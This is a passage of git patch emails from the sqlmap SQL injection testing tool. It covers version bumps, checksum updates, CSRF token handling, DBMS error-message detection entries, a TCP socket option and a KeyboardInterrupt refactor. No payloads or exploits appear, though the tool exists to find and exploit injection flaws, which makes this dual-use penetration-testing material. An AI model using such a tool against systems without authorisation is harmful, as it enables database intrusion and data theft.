!= '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 791a7ad672a..b080815524f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 0f0feede9750be810d2b8a7ab159b7b0 lib/controller/checks.py -93f7eabf92f3da3d96cbd8266e30414d lib/controller/controller.py +ad968ee04e93f6f850d6b7e5ac0073c5 lib/controller/controller.py 988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e62309b22a59e60b270e62586f169441 lib/core/agent.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -24f1c46a4530bde2d66a20ae59f745cd lib/core/settings.py +e2d4507e4cb26ae64f94d17772f67d8d lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py d6da5998fea61068a80d9c671db1095f lib/core/target.py From 38684ec22098abca7c8b0f178e2306895aee3858 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 11 Dec 2018 13:28:51 +0100 Subject: [PATCH 386/428] Fixes #3403 --- lib/core/settings.py | 2 +- lib/core/target.py | 5 ++++- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3b14bfa9664..0754e42e6fe 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.13" +VERSION = "1.2.12.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 1b8232a3227..3d99d10e169 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -408,7 +408,10 @@ def process(match, repl): message += "Do you want sqlmap to automatically update it in further requests? [y/N] " if readInput(message, default='N', boolean=True): - conf.csrfToken = getUnicode(parameter) + class _(unicode): + pass + conf.csrfToken = _(re.escape(getUnicode(parameter))) + conf.csrfToken._original = getUnicode(parameter) break def _setHashDB(): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b080815524f..aa6ea1a8bfc 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,10 +49,10 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e2d4507e4cb26ae64f94d17772f67d8d lib/core/settings.py +0c0d9162f3ec64208c203e7b7e7aaf01 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -d6da5998fea61068a80d9c671db1095f lib/core/target.py +1581be48127a3a7a9fd703359b6e7567 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py cd0067d1798e45f422ce44b98baf57db lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From 83a1b9b2e7bfdfbec8652cf62258ca5c871ee000 Mon Sep 17 00:00:00 2001 From: nil0x42 Date: Fri, 14 Dec 2018 07:08:52 -0200 Subject: [PATCH 387/428] errors.xml: detect mysqli_*() errors. (#3407) MySQL injection error message often happen with mysqli_*() functions nowadays. POC: https://duckduckgo.com/?q=%22warning..mysqli --- xml/errors.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/xml/errors.xml b/xml/errors.xml index 02e529e7f66..60ec971af98 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -4,7 +4,7 @@ - + From d1426a023fb23d8247d5c489d7fa441145925abc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 14 Dec 2018 10:09:40 +0100 Subject: [PATCH 388/428] Fixes #3408 --- lib/core/settings.py | 2 +- lib/request/connect.py | 5 +++-- txt/checksum.md5 | 6 +++--- 3 files changed, 7 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 0754e42e6fe..54cb90a4d97 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.14" +VERSION = "1.2.12.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 37ec0fc1e3c..8dfe9438357 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -994,9 +994,10 @@ def _adjustParameter(paramString, parameter, newValue): token.value = "".join(chr(int(_)) for _ in match.group(1).replace(' ', "").split(',')) if not token: - if conf.csrfUrl != conf.url and code == httplib.OK: + if conf.csrfUrl and conf.csrfToken and conf.csrfUrl != conf.url and code == httplib.OK: if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): - token = page + token.name = conf.csrfToken + token.value = page if not token and conf.cj and any(re.search(conf.csrfToken, _.name, re.I) for _ in conf.cj): for _ in conf.cj: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index aa6ea1a8bfc..17ac233f30a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0c0d9162f3ec64208c203e7b7e7aaf01 lib/core/settings.py +622797ad77a9cff4effe49b046170d50 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -9eb0cc48e7e4779e44f1641aa7d39a4d lib/request/connect.py +40c4cc791ec657b612ccecf5b3241651 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py @@ -478,7 +478,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml 385570003bf7d84f2502191eae8268c6 xml/boundaries.xml -e7c893dd4f3f1d6b5b6f5ffd717d38cc xml/errors.xml +78de3436ae5ad4b3882d59079f2012e4 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml From c7c7e301302d09722784a1e1a4ffad9b128bf91a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 14 Dec 2018 10:45:42 +0100 Subject: [PATCH 389/428] Potential patch for #3374 --- lib/core/settings.py | 2 +- sqlmap.py | 6 ------ txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 54cb90a4d97..f0bf6fdfee8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.15" +VERSION = "1.2.12.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index fb126c7ae6a..d0f4093ff7d 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -194,12 +194,6 @@ def main(): except KeyboardInterrupt: print - errMsg = "user aborted" - try: - logger.critical(errMsg) - except KeyboardInterrupt: - pass - except EOFError: print errMsg = "exit" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 17ac233f30a..c8189fc52f4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -622797ad77a9cff4effe49b046170d50 lib/core/settings.py +0070ff829f953549bd7a8a65090fa09d lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -234,7 +234,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -fa713ca1dc1983f3cb3d90e76a05819a sqlmap.py +55ba3999ab8819e0d34ca075d46fa9dd sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From f5445544758426b2568c6dbc914823f1fb5d2acd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 16 Dec 2018 02:56:31 +0100 Subject: [PATCH 390/428] Bug fix (--forms with --url without protocol) --- lib/core/common.py | 7 ++++++- lib/core/option.py | 2 ++ lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 12 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 8c103814ffb..669288576ca 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4116,7 +4116,12 @@ def checkSameHost(*urls): elif len(urls) == 1: return True else: - return all(re.sub(r"(?i)\Awww\.", "", urlparse.urlparse(url or "").netloc.split(':')[0]) == re.sub(r"(?i)\Awww\.", "", urlparse.urlparse(urls[0] or "").netloc.split(':')[0]) for url in urls[1:]) + def _(value): + if value and not re.search(r"\A\w+://", value): + value = "http://%s" % value + return value + + return all(re.sub(r"(?i)\Awww\.", "", urlparse.urlparse(_(url) or "").netloc.split(':')[0]) == re.sub(r"(?i)\Awww\.", "", urlparse.urlparse(_(urls[0]) or "").netloc.split(':')[0]) for url in urls[1:]) def getHostHeader(url): """ diff --git a/lib/core/option.py b/lib/core/option.py index 85acb8a322f..bd8920f8d03 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1511,6 +1511,8 @@ def _cleanupOptions(): if conf.url: conf.url = conf.url.strip() + if not re.search(r"\A\w+://", conf.url): + conf.url = "http://%s" % conf.url if conf.fileRead: conf.fileRead = ntToPosixSlashes(normalizePath(conf.fileRead)) diff --git a/lib/core/settings.py b/lib/core/settings.py index f0bf6fdfee8..8422c691fc6 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.16" +VERSION = "1.2.12.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c8189fc52f4..9dac3d66465 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ ad968ee04e93f6f850d6b7e5ac0073c5 lib/controller/controller.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e62309b22a59e60b270e62586f169441 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -cf84ff84891b7f51620a457b0bff28c5 lib/core/common.py +a78c563bbaeebd958b25303d83dfe3f2 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -ecf9879967182e6402f3cab6840f5b75 lib/core/option.py +b3ffa34552b4594bbba54513069c642b lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0070ff829f953549bd7a8a65090fa09d lib/core/settings.py +380daa313fda2c14c88b69c3461f0e54 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From c224ea0e377a6b54da7344b34720d3d4137ae87d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 16 Dec 2018 15:20:46 +0100 Subject: [PATCH 391/428] Update of DBMS error messages --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/errors.xml | 13 ++++++++++++- 3 files changed, 15 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 8422c691fc6..e3e8e808d5b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.17" +VERSION = "1.2.12.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9dac3d66465..6754fa418e5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -380daa313fda2c14c88b69c3461f0e54 lib/core/settings.py +52a928e8548d5a45bf1a606ffd59fe1b lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -478,7 +478,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml 385570003bf7d84f2502191eae8268c6 xml/boundaries.xml -78de3436ae5ad4b3882d59079f2012e4 xml/errors.xml +a4130c4e7abfbcb1aaf66386825b6b83 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml diff --git a/xml/errors.xml b/xml/errors.xml index 60ec971af98..3604395e92f 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -11,8 +11,9 @@ - + + @@ -27,6 +28,7 @@ + @@ -46,7 +48,9 @@ + + @@ -69,6 +73,8 @@ + + @@ -78,6 +84,8 @@ + + @@ -87,6 +95,7 @@ + @@ -94,6 +103,7 @@ + @@ -108,6 +118,7 @@ + From eedfa8c888748b529f313ab99a5e3db18860180b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 16 Dec 2018 16:00:04 +0100 Subject: [PATCH 392/428] Another update of DBMS error messages --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/errors.xml | 21 ++++++++++----------- 3 files changed, 13 insertions(+), 14 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e3e8e808d5b..ee8c4f325dc 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.18" +VERSION = "1.2.12.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 6754fa418e5..f3c919777a7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -52a928e8548d5a45bf1a606ffd59fe1b lib/core/settings.py +9afc3256156efa516bab3cdaa515d70b lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -478,7 +478,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml 385570003bf7d84f2502191eae8268c6 xml/boundaries.xml -a4130c4e7abfbcb1aaf66386825b6b83 xml/errors.xml +054874dd9797c22b1de142bf4cbf7f54 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml diff --git a/xml/errors.xml b/xml/errors.xml index 3604395e92f..68f4937fe31 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -4,7 +4,7 @@ - + @@ -36,10 +36,10 @@ - + - + @@ -67,8 +67,7 @@ - - + @@ -90,6 +89,7 @@ + @@ -101,7 +101,7 @@ - + @@ -111,8 +111,7 @@ - - + @@ -124,14 +123,14 @@ - + - + @@ -140,7 +139,7 @@ - + From 4ba9e9397c3a82d352d8eb7f2cec73ee9cace19f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 16 Dec 2018 16:24:01 +0100 Subject: [PATCH 393/428] One more update of DBMS error messages --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/errors.xml | 10 ++++++++-- 3 files changed, 11 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index ee8c4f325dc..0e510894080 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.19" +VERSION = "1.2.12.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f3c919777a7..3f4a25c92b9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9afc3256156efa516bab3cdaa515d70b lib/core/settings.py +7983dceb638a5ba80b33209140bb8531 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -478,7 +478,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml ccb5e02a692f75d11b7fd00f1db48bf5 xml/banner/x-powered-by.xml 385570003bf7d84f2502191eae8268c6 xml/boundaries.xml -054874dd9797c22b1de142bf4cbf7f54 xml/errors.xml +4df7176815d874cf99649201caf10642 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml diff --git a/xml/errors.xml b/xml/errors.xml index 68f4937fe31..b8c8165dca1 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -5,7 +5,6 @@ - @@ -14,6 +13,7 @@ + @@ -29,6 +29,7 @@ + @@ -46,11 +47,11 @@ - + @@ -74,6 +75,7 @@ + @@ -85,6 +87,7 @@ + @@ -96,6 +99,7 @@ + @@ -118,6 +122,7 @@ + @@ -134,6 +139,7 @@ + From c497aa98ed71a8d39da92ba69f0f473d754ecf56 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 14:19:59 +0100 Subject: [PATCH 394/428] Minor TCP optimization --- lib/core/option.py | 6 ++++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 3 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index bd8920f8d03..13e17fdf8e7 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -893,6 +893,12 @@ def _thread(): family, type, proto, address = key s = socket.socket(family, type, proto) s._connect(address) + try: + if type == socket.SOCK_STREAM: + # Reference: https://www.techrepublic.com/article/tcp-ip-options-for-high-performance-data-transmission/ + s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + except: + pass with kb.locks.socket: socket._ready[key].append((s._sock, time.time())) except KeyboardInterrupt: diff --git a/lib/core/settings.py b/lib/core/settings.py index 0e510894080..38ee40015a4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.20" +VERSION = "1.2.12.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3f4a25c92b9..fbd90e7a636 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -b3ffa34552b4594bbba54513069c642b lib/core/option.py +01f7cc33862b2eb2e777f5aff326e2fb lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7983dceb638a5ba80b33209140bb8531 lib/core/settings.py +8e45f357b6d73d128267f3b66fe5e081 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From 28e7c8f3787d7cc448377befc5174e1f4d22617c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 17 Dec 2018 15:00:57 +0100 Subject: [PATCH 395/428] Refactoring KeyboardInterrupt mess --- lib/core/settings.py | 2 +- sqlmap.py | 320 ++++++++++++++++++++----------------------- txt/checksum.md5 | 4 +- 3 files changed, 154 insertions(+), 172 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 38ee40015a4..68a6b924483 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.21" +VERSION = "1.2.12.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index d0f4093ff7d..f5e592b0f66 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -172,10 +172,7 @@ def main(): except SqlmapUserQuitException: errMsg = "user quit" - try: - logger.error(errMsg) - except KeyboardInterrupt: - pass + logger.error(errMsg) except (SqlmapSilentQuitException, bdb.BdbQuit): pass @@ -185,10 +182,8 @@ def main(): except SqlmapBaseException as ex: errMsg = getSafeExString(ex) - try: - logger.critical(errMsg) - except KeyboardInterrupt: - pass + logger.critical(errMsg) + raise SystemExit except KeyboardInterrupt: @@ -196,12 +191,9 @@ def main(): except EOFError: print - errMsg = "exit" - try: - logger.error(errMsg) - except KeyboardInterrupt: - pass + errMsg = "exit" + logger.error(errMsg) except SystemExit: pass @@ -212,140 +204,136 @@ def main(): excMsg = traceback.format_exc() valid = checkIntegrity() - try: - if valid is False: - errMsg = "code integrity check failed (turning off automatic issue creation). " - errMsg += "You should retrieve the latest development version from official GitHub " - errMsg += "repository at '%s'" % GIT_PAGE - logger.critical(errMsg) - print - dataToStdout(excMsg) - raise SystemExit - - elif any(_ in excMsg for _ in ("tamper/", "waf/")): - logger.critical(errMsg) - print - dataToStdout(excMsg) - raise SystemExit - - elif any(_ in excMsg for _ in ("ImportError", "Can't find file for module")): - errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() - logger.critical(errMsg) - raise SystemExit - - elif "MemoryError" in excMsg: - errMsg = "memory exhaustion detected" - logger.critical(errMsg) - raise SystemExit - - elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): - errMsg = "no space left on output device" - logger.critical(errMsg) - raise SystemExit - - elif all(_ in excMsg for _ in ("No such file", "_'", "self.get_prog_name()")): - errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1] - errMsg += "You should retrieve the latest development version from official GitHub " - errMsg += "repository at '%s'" % GIT_PAGE - logger.critical(errMsg) - raise SystemExit - - elif "Read-only file system" in excMsg: - errMsg = "output device is mounted as read-only" - logger.critical(errMsg) - raise SystemExit - - elif "OperationalError: disk I/O error" in excMsg: - errMsg = "I/O error on output device" - logger.critical(errMsg) - raise SystemExit - - elif "Violation of BIDI" in excMsg: - errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)" - logger.critical(errMsg) - raise SystemExit - - elif "_mkstemp_inner" in excMsg: - errMsg = "there has been a problem while accessing temporary files" - logger.critical(errMsg) - raise SystemExit - - elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): - errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " - errMsg += "(Reference: https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe)" - logger.critical(errMsg) - raise SystemExit - - elif all(_ in 